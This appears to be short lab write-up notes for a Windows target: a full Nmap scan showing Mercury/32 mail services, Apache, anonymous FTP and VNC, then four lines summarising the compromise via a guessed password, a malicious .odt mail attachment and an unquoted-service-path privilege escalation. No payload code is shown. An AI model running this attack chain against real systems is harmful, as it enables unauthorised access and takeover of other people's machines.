Exploit
Host:
192.168.219.140Nmap
Nmap scan report for 192.168.179.140
Host is up, received user-set (0.064s latency).
Scanned at 2024-07-24 19:35:46 IST for 626s
Not shown: 65513 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack ttl 125 Mercury/32 smtpd (Mail server account Maiser)
|_smtp-commands: localhost Hello nmap.scanme.org; ESMTPs are:, TIME
79/tcp open finger syn-ack ttl 125 Mercury/32 fingerd
| finger: Login: Admin Name: Mail System Administrator\x0D
| \x0D
|_[No profile information]\x0D
105/tcp open ph-addressbook syn-ack ttl 125 Mercury/32 PH addressbook server
106/tcp open pop3pw syn-ack ttl 125 Mercury/32 poppass service
110/tcp open pop3 syn-ack ttl 125 Mercury/32 pop3d
|_pop3-capabilities: UIDL TOP APOP EXPIRE(NEVER) USER
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
143/tcp open imap syn-ack ttl 125 Mercury/32 imapd 4.62
|_imap-capabilities: IMAP4rev1 OK CAPABILITY AUTH=PLAIN complete X-MERCURY-1A0001
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.46
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
445/tcp open microsoft-ds? syn-ack ttl 125
2224/tcp open http syn-ack ttl 125 Mercury/32 httpd
|_http-title: Mercury HTTP Services
| http-methods:
|_ Supported Methods: GET HEAD
5040/tcp open unknown syn-ack ttl 125
8000/tcp open http syn-ack ttl 125 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-title: Time Travel Company Page
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
11100/tcp open vnc syn-ack ttl 125 VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
|_ Unknown security type (40)
20001/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
|_ftp-bounce: bounce working!
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp 312 Oct 20 2020 .babelrc
| -r--r--r-- 1 ftp ftp 147 Oct 20 2020 .editorconfig
| -r--r--r-- 1 ftp ftp 23 Oct 20 2020 .eslintignore
| -r--r--r-- 1 ftp ftp 779 Oct 20 2020 .eslintrc.js
| -r--r--r-- 1 ftp ftp 167 Oct 20 2020 .gitignore
| -r--r--r-- 1 ftp ftp 228 Oct 20 2020 .postcssrc.js
| -r--r--r-- 1 ftp ftp 346 Oct 20 2020 .tern-project
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 build
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 config
| -r--r--r-- 1 ftp ftp 1376 Oct 20 2020 index.html
| -r--r--r-- 1 ftp ftp 425010 Oct 20 2020 package-lock.json
| -r--r--r-- 1 ftp ftp 2454 Oct 20 2020 package.json
| -r--r--r-- 1 ftp ftp 1100 Oct 20 2020 README.md
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 src
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 static
|_-r--r--r-- 1 ftp ftp 127 Oct 20 2020 _redirects
33006/tcp open unknown syn-ack ttl 125
| fingerprint-strings:
| NULL, SharpTV, TLSSessionReq, TerminalServer, ms-sql-s, pcworx:
|_ Host '192.168.45.181' is not allowed to connect to this MariaDB server
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPCUDP?
Got access to jonas from webpage on 8000/443 from his one-liner description(could have done with cewl too)
Then checked the imap inbox of jonas and found that we can send a mail to mailadmin@localhost with a .odt attachment
Created .odt payload and got access as Ela
Privesc using Veyon unquoted service path.
Last updated